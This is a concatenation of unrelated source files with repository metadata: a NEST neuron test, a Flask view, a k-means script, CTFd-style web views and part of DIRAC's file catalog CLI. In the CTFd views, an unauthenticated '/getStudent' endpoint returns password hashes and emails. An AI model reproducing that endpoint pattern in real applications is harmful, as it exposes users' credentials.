nest.Connect(pre_parrot, post_parrot,
syn_spec=syn_spec, conn_spec=conn_spec)
# get STDP synapse and weight before protocol
syn = nest.GetConnections(
source=pre_parrot, synapse_model="stdp_synapse")
w_pre = syn.get('weight')
last_time = max(pre_times[-1], post_times[-1])
nest.Simulate(last_time + 2 * delay)
# get weight post protocol
w_post = syn.get('weight')
return w_pre, w_post
def test_ParrotNeuronSTDPProtocolPotentiation(self):
"""Check pre-post spike pairings between parrot_neurons
increments weights."""
dt = 10.
w_pre, w_post = self.run_protocol(dt)
assert w_pre < w_post, "Parrot neuron STDP potentiation \
protocol failed to elicit positive weight changes."
def test_ParrotNeuronSTDPProtocolDepression(self):
"""Check post-pre spike pairings between parrot_neurons
decrement weights."""
dt = -10.
w_pre, w_post = self.run_protocol(dt)
assert w_pre > w_post, "Parrot neuron STDP depression \
protocol failed to elicit negative weight changes."
def suite():
# makeSuite is sort of obsolete http://bugs.python.org/issue2721
# using loadTestsFromTestCase instead.
suite1 = unittest.TestLoader().loadTestsFromTestCase(
ParrotNeuronTestCase)
suite2 = unittest.TestLoader().loadTestsFromTestCase(
ParrotNeuronPoissonTestCase)
suite3 = unittest.TestLoader().loadTestsFromTestCase(
ParrotNeuronSTDPTestCase)
return unittest.TestSuite([suite1, suite2, suite3])
def run():
runner = unittest.TextTestRunner(verbosity=2)
runner.run(suite())
if __name__ == "__main__":
run()
|
SepehrMN/nest-simulator
|
pynest/nest/tests/test_parrot_neuron.py
|
Python
|
gpl-2.0
| 10,016
|
[
"NEURON"
] |
7151170dd330dd22ac7c7d392aafa80da8465d425221a5edec1d557f178b79e4
|
from __future__ import absolute_import
# coding=utf-8
from flask import request
from flask.views import MethodView
from flask.blueprints import Blueprint
from firefly.models.consts import KEYBOARD_URL_MAPS
from firefly.libs.template import render_template
bp = Blueprint('keyboard', __name__, url_prefix='/keyboard')
class KeyboardView(MethodView):
def get(self):
url = request.args.get('url', '')
url_pattern = url.rsplit('/', 1)[0]
keyboards = KEYBOARD_URL_MAPS['default']
if url_pattern in KEYBOARD_URL_MAPS:
keyboards += KEYBOARD_URL_MAPS[url_pattern]
# group the flat keyboard list into rows of two entries each
columns = zip(*[iter(keyboards)] * 2)
return render_template(
'widgets/keyboard.html', columns=columns
)
bp.add_url_rule('/', view_func=KeyboardView.as_view('keyboard'))
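# Registration sketch (standard Flask pattern; the app object is
# hypothetical):
#
# from flask import Flask
# app = Flask(__name__)
# app.register_blueprint(bp) # serves GET /keyboard/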
|
matrixorz/firefly
|
firefly/views/keyboard.py
|
Python
|
mit
| 817
|
[
"Firefly"
] |
7eac1f20fdaf37603e4546bebd5585aa02fd8162ef9faa792b25d83c738143a2
|
#!/usr/bin/env python
"""
Testing k-means clustering
for purely random and normally distributed data
"""
import os
import math
import random
from numpy import array, random as numpy_random
from ase.data import chemical_symbols
from kmeans import Point, kmeans, k_from_n
from element_groups import get_element_group
from set_path import VIS_PATH
DISTRIB = 'GAUSSIAN'
data, ref = [], []
N = 200
def gaussian_distribution(N, k):
n = float(N)/k
X = []
for i in range(k):
init = (random.uniform(-1, 1), random.uniform(-1, 1), random.uniform(-1, 1))
s = random.uniform(0.05, 0.5)
x = []
while len(x) < n:
a, b, c = array([numpy_random.normal(init[0], s), numpy_random.normal(init[1], s), numpy_random.normal(init[2], s)])
if abs(a) < 1 and abs(b) < 1 and abs(c) < 1:
x.append([a,b,c])
X.extend(x)
X = array(X)[:N]
return X
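# Sanity sketch: the rejection loop above keeps every coordinate inside the
# open cube (-1, 1)^3, e.g.
# assert (abs(gaussian_distribution(50, 5)) < 1).all()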
if DISTRIB == 'RANDOM':
set_x, set_y = [random.choice(chemical_symbols) for i in range(N)], [random.choice(chemical_symbols) for i in range(N)]
set_z = [round(random.uniform(0.1, 15.0), 2) for i in range(N)]
data, ref = [], []
for i in range(N):
formula = set_x[i] + set_y[i]
set_x[i] = get_element_group(chemical_symbols.index(set_x[i]))
set_y[i] = get_element_group(chemical_symbols.index(set_y[i]))
data.append(Point([set_x[i], set_y[i], set_z[i]], formula))
ref.append([set_x[i], set_y[i], set_z[i], formula])
else:
nte = len(chemical_symbols)
G = gaussian_distribution(N, k_from_n(N))
set_x = (G[:,0] + 1)/2*nte
set_x = map(lambda x: int(math.floor(x)), set_x.tolist())
set_y = (G[:,1] + 1)/2*nte
set_y = map(lambda x: int(math.floor(x)), set_y.tolist())
set_z = (G[:,2] + 1)/2*15
set_z = map(lambda x: round(x, 2), set_z.tolist())
for i in range(N):
formula = chemical_symbols[set_x[i]] + chemical_symbols[set_y[i]]
set_x[i] = get_element_group(set_x[i])
set_y[i] = get_element_group(set_y[i])
data.append(Point([set_x[i], set_y[i], set_z[i]]))
ref.append([set_x[i], set_y[i], set_z[i], formula])
clusters = kmeans(data, k_from_n(len(data)))
points_file = os.path.join(VIS_PATH, "points.csv")
cluster_file = os.path.join(VIS_PATH, "clusters.csv")
with open(points_file, "w") as s:
s.write("x,y,z,label\n")
for n, i in enumerate(ref):
s.write(",".join(map(str, i)) + "\n")
with open(cluster_file, "w") as s:
s.write("x,y,z\n")
for n, c in enumerate(clusters, 1):
for p in c.points:
s.write(",".join(map(str, p.coords)) + "\n")
s.write("-,-,-\n")
print points_file
print cluster_file
|
ansobolev/tilde
|
tutorials/simple_data_mining/sample_kmeans.py
|
Python
|
mit
| 2,670
|
[
"ASE",
"Gaussian"
] |
e274284b7253052758de0741c2b76de2458feb0bc544e79666673cc5b934cc53
|
import os
import re
from datetime import datetime
from flask import current_app as app, render_template, request, redirect, abort, jsonify, url_for, session, Blueprint, Response, send_file
from jinja2.exceptions import TemplateNotFound
from passlib.hash import bcrypt_sha256
from sqlalchemy import union_all
from CTFd.utils import authed, is_setup, validate_url, get_config, set_config, sha512, cache, ctftime, view_after_ctf, ctf_started, \
is_admin
from CTFd.models import db, Students, Solves, Awards, Files, Pages, Teams, Challenges, Sections
views = Blueprint('views', __name__)
@views.before_request
def redirect_setup():
if request.path.startswith("/static"):
return
if not is_setup() and request.path != "/setup":
return redirect(url_for('views.setup'))
@views.route('/setup', methods=['GET', 'POST'])
def setup():
# with app.app_context():
# admin = Teams.query.filter_by(admin=True).first()
if not is_setup():
if not session.get('nonce'):
session['nonce'] = sha512(os.urandom(10))
if request.method == 'POST':
ctf_name = request.form['ctf_name']
ctf_name = set_config('ctf_name', ctf_name)
# CSS
css = set_config('start', '')
# Admin user
name = request.form['name']
email = request.form['email']
password = request.form['password']
section = Sections(0, 123)
db.session.add(section)
db.session.commit()
team = Teams("admin", section.sectionNumber)
db.session.add(team)
db.session.commit()
admin = Students(name, email, password, team.id, section.sectionNumber)
admin.admin = True
admin.banned = True
# Index page
page = Pages('index', """<div class="container main-container">
<img class="logo" src="{0}/static/original/img/logo.png" />
<h3 class="text-center">
Welcome to a cool CTF framework written by <a href="https://github.com/ColdHeat">Kevin Chung</a> of <a href="https://github.com/isislab">@isislab</a>
<br>
Modified for educational use by <a href="https://github.com/camgeehr">Cameron Geehr</a>, <a href="https://github.com/jaboyles">Jacob Boyles</a>, and <a href="https://github.com/bgoulds">Brian Gouldsberry</a>
</h3>
</div>""".format(request.script_root))
# max attempts per challenge
max_tries = set_config("max_tries", 0)
# Start time
start = set_config('start', None)
end = set_config('end', None)
# Challenges cannot be viewed by unregistered users
view_challenges_unregistered = set_config('view_challenges_unregistered', None)
# Allow/Disallow registration
prevent_registration = set_config('prevent_registration', None)
# Verify emails
verify_emails = set_config('verify_emails', None)
mail_server = set_config('mail_server', None)
mail_port = set_config('mail_port', None)
mail_tls = set_config('mail_tls', None)
mail_ssl = set_config('mail_ssl', None)
mail_username = set_config('mail_username', None)
mail_password = set_config('mail_password', None)
setup = set_config('setup', True)
db.session.add(page)
db.session.add(admin)
db.session.commit()
db.session.close()
app.setup = False
with app.app_context():
cache.clear()
return redirect(url_for('views.static_html'))
return render_template('setup.html', nonce=session.get('nonce'), setup=True)
return redirect(url_for('views.static_html'))
# Custom CSS handler
@views.route('/static/user.css')
def custom_css():
return Response(get_config("css"), mimetype='text/css')
# Static HTML files
@views.route("/", defaults={'template': 'index'})
@views.route("/<template>")
def static_html(template):
try:
return render_template('%s.html' % template)
except TemplateNotFound:
page = Pages.query.filter_by(route=template).first_or_404()
return render_template('page.html', content=page.html)
@views.route('/students', defaults={'page': '1'})
@views.route('/students/<int:page>')
def students(page):
page = abs(int(page))
results_per_page = 50
page_start = results_per_page * (page - 1)
page_end = results_per_page * (page - 1) + results_per_page
if get_config('verify_emails'):
count = Students.query.filter_by(verified=True, banned=False).count()
students = Students.query.filter_by(verified=True, banned=False).slice(page_start, page_end).all()
else:
count = Students.query.filter_by(banned=False).count()
students = Students.query.filter_by(banned=False).slice(page_start, page_end).all()
pages = int(count / results_per_page) + (count % results_per_page > 0)
return render_template('students.html', students=students, student_pages=pages, curr_page=page)
@views.route('/student/<int:studentid>', methods=['GET', 'POST'])
def student(studentid):
if get_config('view_scoreboard_if_authed') and not authed():
return redirect(url_for('auth.login', next=request.path))
if not is_admin() and session['id'] != studentid:
return render_template('errors/403.html')
user = Students.query.filter_by(id=studentid).first_or_404()
solves = Solves.query.filter_by(studentid=studentid)
awards = Awards.query.filter_by(studentid=studentid).all()
score = user.score()
place = user.place()
db.session.close()
if request.method == 'GET':
return render_template('student.html', solves=solves, awards=awards, student=user, score=score, place=place)
elif request.method == 'POST':
json = {'solves': []}
for x in solves:
json['solves'].append({'id': x.id, 'chal': x.chalid, 'student': x.studentid})
return jsonify(json)
@views.route('/getStudent/<int:studentid>', methods=['GET'])
def getStudent(studentid):
student = Students.query.filter_by(id=studentid).first()
json_data = {
'id' : student.id,
'name' : student.name,
'email' : student.email,
'teamid' : student.teamid,
'password' : student.password,
'bracket' : student.bracket,
'banned' : student.banned,
'verified' : student.verified,
'admin' : student.admin,
'joined' : student.joined,
'sectionid' : student.sectionid
}
db.session.close()
return jsonify(json_data)
@views.route('/profile', methods=['POST', 'GET'])
def profile():
if authed():
if request.method == "POST":
errors = []
name = request.form.get('name')
email = request.form.get('email')
user = Students.query.filter_by(id=session['id']).first()
if not get_config('prevent_name_change'):
names = Students.query.filter_by(name=name).first()
name_len = len(request.form['name']) == 0
emails = Students.query.filter_by(email=email).first()
valid_email = re.match(r"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)", email)
if ('password' in request.form.keys() and not len(request.form['password']) == 0) and \
(not bcrypt_sha256.verify(request.form.get('confirm').strip(), user.password)):
errors.append("Your old password doesn't match what we have.")
if not valid_email:
errors.append("That email doesn't look right")
if not get_config('prevent_name_change') and names and name != session['username']:
errors.append('That student name is already taken')
if emails and emails.id != session['id']:
errors.append('That email has already been used')
if not get_config('prevent_name_change') and name_len:
errors.append('Pick a longer student name')
if len(errors) > 0:
return render_template('profile.html', name=name, email=email, errors=errors)
else:
student = Students.query.filter_by(id=session['id']).first()
if not get_config('prevent_name_change'):
student.name = name
if student.email != email.lower():
student.email = email.lower()
if get_config('verify_emails'):
student.verified = False
session['username'] = student.name
if 'password' in request.form.keys() and not len(request.form['password']) == 0:
student.password = bcrypt_sha256.encrypt(request.form.get('password'))
db.session.commit()
db.session.close()
return redirect(url_for('views.profile'))
else:
user = Students.query.filter_by(id=session['id']).first()
name = user.name
email = user.email
prevent_name_change = get_config('prevent_name_change')
confirm_email = get_config('verify_emails') and not user.verified
return render_template('profile.html', name=name, email=email, prevent_name_change=prevent_name_change,
confirm_email=confirm_email)
else:
return redirect(url_for('auth.login'))
@views.route('/files', defaults={'path': ''})
@views.route('/files/<path:path>')
def file_handler(path):
f = Files.query.filter_by(location=path).first_or_404()
if f.chal:
if not is_admin():
if not ctftime():
if view_after_ctf() and ctf_started():
pass
else:
abort(403)
return send_file(os.path.join(app.root_path, 'uploads', f.location))
@views.route('/teams', defaults={'page': '1'})
@views.route('/teams/<int:page>')
def teams(page):
if get_config('view_scoreboard_if_authed') and not authed():
return redirect(url_for('auth.login', next=request.path))
studentid = session['id']
page = abs(int(page))
results_per_page = 50
page_start = results_per_page * (page - 1)
page_end = results_per_page * (page - 1) + results_per_page
student = Students.query.filter_by(id=studentid).first()
count = Teams.query.filter_by().count()
teams = Teams.query.filter_by(sectionNumber=student.sectionid).slice(page_start, page_end).all()
pages = int(count / results_per_page) + (count % results_per_page > 0)
return render_template('teams.html', teams=teams, team_pages=pages, curr_page=page)
@views.route('/team/<int:teamid>')
def team(teamid):
if get_config('view_scoreboard_if_authed') and not authed():
return redirect(url_for('auth.login', next=request.path))
team = Teams.query.filter_by(id=teamid).first()
student = Students.query.filter_by(id = session['id']).first()
if student.sectionid != team.sectionNumber:
return render_template('errors/403.html')
students = Students.query.filter_by(teamid=teamid)
# get solves data by team id
# get awards data by team id
challenges = Challenges.query.all()
db.session.close()
if request.method == 'GET':
return render_template('team.html', team=team, students=students, challenges=challenges)
elif request.method == 'POST':
return None # return solves data by team id
@views.route('/team/<int:teamid>/challenges')
def teamChallenges(teamid):
team = Teams.query.filter_by(id=teamid).first()
challenges = team.challenges()
return render_template('tChallenges.html', team=team, challenges=challenges)
@views.route('/team/<int:teamid>/solves')
def teamSolves(teamid):
team = Teams.query.filter_by(id=teamid).first()
solves = team.solves()
return render_template('tSolves.html', team=team, solves=solves)
|
jaboyles/CFTD_Senior_Project
|
CTFd/views.py
|
Python
|
apache-2.0
| 12,054
|
[
"Brian"
] |
f911a8e1046ed35399aab23c6c39c306a23ddf30a41b453a18107cda2c8b85da
|
#!/usr/bin/env python
""" File Catalog Client Command Line Interface. """
__RCSID__ = "$Id$"
import stat
import cmd
import commands
import os.path
import time
import sys
from types import DictType, ListType
from DIRAC import gConfig
from DIRAC.Core.Security import CS
from DIRAC.Core.Security.ProxyInfo import getProxyInfo
from DIRAC.Core.Utilities.List import uniqueElements
from DIRAC.Interfaces.API.Dirac import Dirac
from DIRAC.Core.Utilities.PrettyPrint import int_with_commas, printTable
from DIRAC.DataManagementSystem.Client.CmdDirCompletion.AbstractFileSystem import DFCFileSystem, UnixLikeFileSystem
from DIRAC.DataManagementSystem.Client.CmdDirCompletion.DirectoryCompletion import DirectoryCompletion
class DirectoryListing:
def __init__(self):
self.entries = []
def addFile(self,name,fileDict,repDict,numericid):
""" Pretty print of the file ls output
"""
perm = fileDict['Mode']
date = fileDict['ModificationDate']
#nlinks = fileDict.get('NumberOfLinks',0)
nreplicas = len( repDict )
size = fileDict['Size']
if fileDict.has_key('Owner'):
uname = fileDict['Owner']
elif fileDict.has_key('OwnerDN'):
result = CS.getUsernameForDN(fileDict['OwnerDN'])
if result['OK']:
uname = result['Value']
else:
uname = 'unknown'
else:
uname = 'unknown'
if numericid:
uname = str(fileDict['UID'])
if fileDict.has_key('OwnerGroup'):
gname = fileDict['OwnerGroup']
elif fileDict.has_key('OwnerRole'):
groups = CS.getGroupsWithVOMSAttribute('/'+fileDict['OwnerRole'])
if groups:
if len(groups) > 1:
gname = groups[0]
default_group = gConfig.getValue('/Registry/DefaultGroup','unknown')
if default_group in groups:
gname = default_group
else:
gname = groups[0]
else:
gname = 'unknown'
else:
gname = 'unknown'
if numericid:
gname = str(fileDict['GID'])
self.entries.append( ('-'+self.__getModeString(perm),nreplicas,uname,gname,size,date,name) )
def addDirectory(self,name,dirDict,numericid):
""" Pretty print of the file ls output
"""
perm = dirDict['Mode']
date = dirDict['ModificationDate']
nlinks = 0
size = 0
if dirDict.has_key('Owner'):
uname = dirDict['Owner']
elif dirDict.has_key('OwnerDN'):
result = CS.getUsernameForDN(dirDict['OwnerDN'])
if result['OK']:
uname = result['Value']
else:
uname = 'unknown'
else:
uname = 'unknown'
if numericid:
uname = str(dirDict['UID'])
if dirDict.has_key('OwnerGroup'):
gname = dirDict['OwnerGroup']
elif dirDict.has_key('OwnerRole'):
groups = CS.getGroupsWithVOMSAttribute('/'+dirDict['OwnerRole'])
if groups:
if len(groups) > 1:
gname = groups[0]
default_group = gConfig.getValue('/Registry/DefaultGroup','unknown')
if default_group in groups:
gname = default_group
else:
gname = groups[0]
else:
gname = 'unknown'
if numericid:
gname = str(dirDict['GID'])
self.entries.append( ('d'+self.__getModeString(perm),nlinks,uname,gname,size,date,name) )
def addDataset(self,name,datasetDict,numericid):
""" Pretty print of the dataset ls output
"""
perm = datasetDict['Mode']
date = datasetDict['ModificationDate']
size = datasetDict['TotalSize']
if datasetDict.has_key('Owner'):
uname = datasetDict['Owner']
elif datasetDict.has_key('OwnerDN'):
result = CS.getUsernameForDN(datasetDict['OwnerDN'])
if result['OK']:
uname = result['Value']
else:
uname = 'unknown'
else:
uname = 'unknown'
if numericid:
uname = str( datasetDict['UID'] )
gname = 'unknown'
if datasetDict.has_key('OwnerGroup'):
gname = datasetDict['OwnerGroup']
if numericid:
gname = str( datasetDict ['GID'] )
numberOfFiles = datasetDict ['NumberOfFiles']
self.entries.append( ('s'+self.__getModeString(perm),numberOfFiles,uname,gname,size,date,name) )
def __getModeString(self,perm):
""" Get string representation of the file/directory mode
"""
# build the rwx triplets for user, group and other from the stat bits
pstring = ''
for bit, char in ( (stat.S_IRUSR,'r'), (stat.S_IWUSR,'w'), (stat.S_IXUSR,'x'),
(stat.S_IRGRP,'r'), (stat.S_IWGRP,'w'), (stat.S_IXGRP,'x'),
(stat.S_IROTH,'r'), (stat.S_IWOTH,'w'), (stat.S_IXOTH,'x') ):
pstring += char if perm & bit else '-'
return pstring
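# Sketch: a mode of 0755 (stat.S_IRWXU | stat.S_IRGRP | stat.S_IXGRP |
# stat.S_IROTH | stat.S_IXOTH) renders as 'rwxr-xr-x'.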
def printListing(self,reverse,timeorder):
""" Print the collected entries, sorted by name or by modification time
"""
if timeorder:
if reverse:
self.entries.sort(key=lambda x: x[5])
else:
self.entries.sort(key=lambda x: x[5],reverse=True)
else:
if reverse:
self.entries.sort(key=lambda x: x[6],reverse=True)
else:
self.entries.sort(key=lambda x: x[6])
# Determine the field widths
wList = [0] * 7
for d in self.entries:
for i in range(7):
if len(str(d[i])) > wList[i]:
wList[i] = len(str(d[i]))
for e in self.entries:
print str(e[0]),
print str(e[1]).rjust(wList[1]),
print str(e[2]).ljust(wList[2]),
print str(e[3]).ljust(wList[3]),
print str(e[4]).rjust(wList[4]),
print str(e[5]).rjust(wList[5]),
print str(e[6])
def addSimpleFile(self,name):
""" Add single files to be sorted later"""
self.entries.append(name)
def printOrdered(self):
""" print the ordered list"""
self.entries.sort()
for entry in self.entries:
print entry
class FileCatalogClientCLI(cmd.Cmd):
""" usage: FileCatalogClientCLI.py xmlrpc-url.
The URL should use HTTP protocol, and specify a port. e.g.::
http://localhost:7777
This provides a command line interface to the FileCatalog Exported API::
ls(path) - lists the directory path
The command line interface to these functions can be listed by typing "help"
at the prompt.
Other modules which want access to the FileCatalog API should simply make
their own internal connection to the XMLRPC server using code like::
server = xmlrpclib.Server(xmlrpc_url)
server.exported_function(args)
"""
intro = """
File Catalog Client $Revision: 1.17 $Date:
"""
def __init__(self, client):
cmd.Cmd.__init__(self)
self.fc = client
self.cwd = '/'
self.prompt = 'FC:'+self.cwd+'> '
self.previous_cwd = '/'
self.dfc_fs = DFCFileSystem(self.fc)
self.lfn_dc = DirectoryCompletion(self.dfc_fs)
self.ul_fs = UnixLikeFileSystem()
self.ul_dc = DirectoryCompletion(self.ul_fs)
def getPath(self,apath):
if apath.find('/') == 0:
path = apath
else:
path = self.cwd+'/'+apath
path = path.replace('//','/')
return os.path.normpath(path)
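# Illustrative examples (hypothetical paths, assuming self.cwd == '/grid/user'):
#   getPath('/data/a.txt')  -> '/data/a.txt'            (absolute, kept as is)
#   getPath('data/a.txt')   -> '/grid/user/data/a.txt'  (relative to cwd)
#   getPath('../a.txt')     -> '/grid/a.txt'            (cleaned by normpath)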
def do_register(self,args):
""" Register a record to the File Catalog
usage:
register file <lfn> <pfn> <size> <SE> [<guid>] - register new file record in the catalog
register replica <lfn> <pfn> <SE> - register new replica in the catalog
"""
argss = args.split()
if (len(argss)==0):
print self.do_register.__doc__
return
option = argss[0]
del argss[0]
if option == 'file':
if (len(argss) < 4):
print self.do_register.__doc__
return
return self.registerFile(argss)
elif option == 'pfn' or option == "replica":
# TODO
# Is the __doc__ not complete ?
if (len(argss) != 3):
print self.do_register.__doc__
return
return self.registerReplica(argss)
else:
print "Unknown option:",option
# An Auto Completion For ``register``
_available_register_cmd = ['file', 'replica']
def complete_register(self, text, line, begidx, endidx):
result = []
args = line.split()
if len(args) >= 2 and (args[1] in self._available_register_cmd):
# if 'register file' or 'register replica' exists,
# try to do LFN auto completion.
cur_path = ""
if (len(args) == 3):
cur_path = args[2]
result = self.lfn_dc.parse_text_line(text, cur_path, self.cwd)
return result
result = [i for i in self._available_register_cmd if i.startswith(text)]
return result
def do_add(self,args):
""" Upload a new file to a SE and register in the File Catalog
usage:
add <lfn> <pfn> <SE> [<guid>]
"""
# ToDo - adding directories
argss = args.split()
if len(argss) < 3:
print "Error: insufficient number of arguments"
return
lfn = argss[0]
lfn = self.getPath(lfn)
pfn = argss[1]
se = argss[2]
guid = None
if len(argss)>3:
guid = argss[3]
dirac = Dirac()
result = dirac.addFile(lfn,pfn,se,guid,printOutput=False)
if not result['OK']:
print 'Error: %s' %(result['Message'])
else:
print "File %s successfully uploaded to the %s SE" % (lfn,se)
def complete_add(self, text, line, begidx, endidx):
result = []
args = line.split()
# the first argument -- LFN.
if (1<=len(args)<=2):
# If last char is ' ',
# this can be a new parameter.
if (len(args) == 1) or (len(args)==2 and (not line.endswith(' '))):
cur_path = ""
if (len(args) == 2):
cur_path = args[1]
result = self.lfn_dc.parse_text_line(text, cur_path, self.cwd)
return result
def do_get(self,args):
""" Download file from grid and store in a local directory
usage:
get <lfn> [<local_directory>]
"""
argss = args.split()
if (len(argss)==0):
print self.do_get.__doc__
return
lfn = argss[0]
lfn = self.getPath(lfn)
dir_ = ''
if len(argss)>1:
dir_ = argss[1]
dirac = Dirac()
localCWD = ''
if dir_:
localCWD = os.getcwd()
os.chdir(dir_)
result = dirac.getFile(lfn)
if localCWD:
os.chdir(localCWD)
if not result['OK']:
print 'Error: %s' %(result['Message'])
else:
print "File %s successfully downloaded" % lfn
def complete_get(self, text, line, begidx, endidx):
result = []
args = line.split()
# the first argument -- LFN.
if (1<=len(args)<=2):
# If last char is ' ',
# this can be a new parameter.
if (len(args) == 1) or (len(args)==2 and (not line.endswith(' '))):
cur_path = ""
if (len(args) == 2):
cur_path = args[1]
result = self.lfn_dc.parse_text_line(text, cur_path, self.cwd)
return result
def do_unregister(self,args):
""" Unregister records in the File Catalog
usage:
unregister replica <lfn> <se>
unregister file <lfn>
unregister dir <path>
"""
argss = args.split()
if (len(argss)==0):
print self.do_unregister.__doc__
return
option = argss[0]
del argss[0]
if option == 'replica':
if (len(argss) != 2):
print self.do_unregister.__doc__
return
return self.removeReplica(argss)
elif option == 'file':
if (len(argss) != 1):
print self.do_unregister.__doc__
return
return self.removeFile(argss)
elif option == "dir" or option == "directory":
if (len(argss) != 1):
print self.do_unregister.__doc__
return
return self.removeDirectory(argss)
else:
print "Error: illegal option %s" % option
# An Auto Completion For ``register``
_available_unregister_cmd = ['replica', 'file', 'dir', 'directory']
def complete_unregister(self, text, line, begidx, endidx):
result = []
args = line.split()
if len(args) >= 2 and (args[1] in self._available_unregister_cmd):
# if 'unregister file' or 'unregister replica' and so on exists,
# try to do LFN auto completion.
cur_path = ""
if (len(args) == 3):
cur_path = args[2]
result = self.lfn_dc.parse_text_line(text, cur_path, self.cwd)
return result
result = [i for i in self._available_unregister_cmd if i.startswith(text)]
return result
def do_rmreplica(self,args):
""" Remove LFN replica from the storage and from the File Catalog
usage:
rmreplica <lfn> <se>
"""
argss = args.split()
if (len(argss) != 2):
print self.do_rmreplica.__doc__
return
lfn = argss[0]
lfn = self.getPath(lfn)
print "lfn:",lfn
se = argss[1]
try:
result = self.fc.setReplicaStatus( {lfn:{'SE':se,'Status':'Trash'}} )
if result['OK']:
print "Replica at",se,"moved to Trash Bin"
else:
print "Failed to remove replica at",se
print result['Message']
except Exception, x:
print "Error: rmreplica failed with exception: ", x
def complete_rmreplica(self, text, line, begidx, endidx):
result = []
args = line.split()
# the first argument -- LFN.
if (1<=len(args)<=2):
# If last char is ' ',
# this can be a new parameter.
if (len(args) == 1) or (len(args)==2 and (not line.endswith(' '))):
cur_path = ""
if (len(args) == 2):
cur_path = args[1]
result = self.lfn_dc.parse_text_line(text, cur_path, self.cwd)
return result
def do_rm(self,args):
""" Remove file from the storage and from the File Catalog
usage:
rm <lfn>
NB: this method is not fully implemented!
"""
# Not yet really implemented
argss = args.split()
if len(argss) != 1:
print self.do_rm.__doc__
return
self.removeFile(argss)
def complete_rm(self, text, line, begidx, endidx):
result = []
args = line.split()
# the first argument -- LFN.
if (1<=len(args)<=2):
# If last char is ' ',
# this can be a new parameter.
if (len(args) == 1) or (len(args)==2 and (not line.endswith(' '))):
cur_path = ""
if (len(args) == 2):
cur_path = args[1]
result = self.lfn_dc.parse_text_line(text, cur_path, self.cwd)
return result
def do_rmdir(self,args):
""" Remove directory from the storage and from the File Catalog
usage:
rmdir <path>
NB: this method is not fully implemented!
"""
# Not really implemented yet
argss = args.split()
if len(argss) != 1:
print self.do_rmdir.__doc__
return
self.removeDirectory(argss)
def complete_rmdir(self, text, line, begidx, endidx):
result = []
args = line.split()
# the first argument -- LFN.
if (1<=len(args)<=2):
# If last char is ' ',
# this can be a new parameter.
if (len(args) == 1) or (len(args)==2 and (not line.endswith(' '))):
cur_path = ""
if (len(args) == 2):
cur_path = args[1]
result = self.lfn_dc.parse_text_line(text, cur_path, self.cwd)
return result
def removeReplica(self,args):
""" Remove replica from the catalog
"""
path = args[0]
lfn = self.getPath(path)
print "lfn:",lfn
rmse = args[1]
try:
result = self.fc.removeReplica( {lfn:{'SE':rmse}} )
if result['OK']:
if 'Failed' in result['Value']:
if lfn in result['Value']['Failed']:
print "ERROR: %s" % ( result['Value']['Failed'][lfn])
elif lfn in result['Value']['Successful']:
print "File %s at %s removed from the catalog" %( lfn, rmse )
else:
"ERROR: Unexpected returned value %s" % result['Value']
else:
print "File %s at %s removed from the catalog" %( lfn, rmse )
else:
print "Failed to remove replica at",rmse
print result['Message']
except Exception, x:
print "Error: rmpfn failed with exception: ", x
def removeFile(self,args):
""" Remove file from the catalog
"""
path = args[0]
lfn = self.getPath(path)
print "lfn:",lfn
try:
result = self.fc.removeFile(lfn)
if result['OK']:
if 'Failed' in result['Value']:
if lfn in result['Value']['Failed']:
print "ERROR: %s" % ( result['Value']['Failed'][lfn] )
elif lfn in result['Value']['Successful']:
print "File",lfn,"removed from the catalog"
else:
print "ERROR: Unexpected result %s" % result['Value']
else:
print "File",lfn,"removed from the catalog"
else:
print "Failed to remove file from the catalog"
print result['Message']
except Exception, x:
print "Error: rm failed with exception: ", x
def removeDirectory(self,args):
""" Remove file from the catalog
"""
path = args[0]
lfn = self.getPath(path)
print "lfn:",lfn
try:
result = self.fc.removeDirectory(lfn)
if result['OK']:
if result['Value']['Successful']:
print "Directory",lfn,"removed from the catalog"
elif result['Value']['Failed']:
print "ERROR:", result['Value']['Failed'][lfn]
else:
print "Failed to remove directory from the catalog"
print result['Message']
except Exception, x:
print "Error: rm failed with exception: ", x
def do_replicate(self,args):
""" Replicate a given file to a given SE
usage:
replicate <LFN> <SE> [<SourceSE>]
"""
argss = args.split()
if len(argss) < 2:
print "Error: unsufficient number of arguments"
return
lfn = argss[0]
lfn = self.getPath(lfn)
se = argss[1]
sourceSE = ''
if len(argss)>2:
sourceSE=argss[2]
try:
dirac = Dirac()
result = dirac.replicateFile(lfn,se,sourceSE,printOutput=True)
if not result['OK']:
print 'Error: %s' %(result['Message'])
elif not result['Value']:
print "Replica is already present at the target SE"
else:
print "File %s successfully replicated to the %s SE" % (lfn,se)
except Exception, x:
print "Error: replicate failed with exception: ", x
def complete_replicate(self, text, line, begidx, endidx):
result = []
args = line.split()
# the first argument -- LFN.
if (1<=len(args)<=2):
# If last char is ' ',
# this can be a new parameter.
if (len(args) == 1) or (len(args)==2 and (not line.endswith(' '))):
cur_path = ""
if (len(args) == 2):
cur_path = args[1]
result = self.lfn_dc.parse_text_line(text, cur_path, self.cwd)
return result
def do_replicas(self,args):
""" Get replicas for the given file specified by its LFN
usage: replicas <lfn>
"""
argss = args.split()
if (len(argss) == 0):
print self.do_replicas.__doc__
return
apath = argss[0]
path = self.getPath(apath)
print "lfn:",path
try:
result = self.fc.getReplicas(path)
if result['OK']:
if result['Value']['Successful']:
for se,entry in result['Value']['Successful'][path].items():
print se.ljust(15),entry
else:
print "Replicas: ",result['Message']
except Exception, x:
print "replicas failed: ", x
def complete_replicas(self, text, line, begidx, endidx):
result = []
args = line.split()
# the first argument -- LFN.
if (1<=len(args)<=2):
# If last char is ' ',
# this can be a new parameter.
if (len(args) == 1) or (len(args)==2 and (not line.endswith(' '))):
cur_path = ""
if (len(args) == 2):
cur_path = args[1]
result = self.lfn_dc.parse_text_line(text, cur_path, self.cwd)
return result
def registerFile(self,args):
""" Add a file to the catatlog
usage: add <lfn> <pfn> <size> <SE> [<guid>]
"""
path = args[0]
infoDict = {}
lfn = self.getPath(path)
infoDict['PFN'] = args[1]
infoDict['Size'] = int(args[2])
infoDict['SE'] = args[3]
if len(args) == 5:
guid = args[4]
else:
_status,guid = commands.getstatusoutput('uuidgen')
infoDict['GUID'] = guid
infoDict['Checksum'] = ''
fileDict = {}
fileDict[lfn] = infoDict
try:
result = self.fc.addFile(fileDict)
if not result['OK']:
print "Failed to add file to the catalog: ",
print result['Message']
elif result['Value']['Failed']:
if result['Value']['Failed'].has_key(lfn):
print 'Failed to add file:',result['Value']['Failed'][lfn]
elif result['Value']['Successful']:
if result['Value']['Successful'].has_key(lfn):
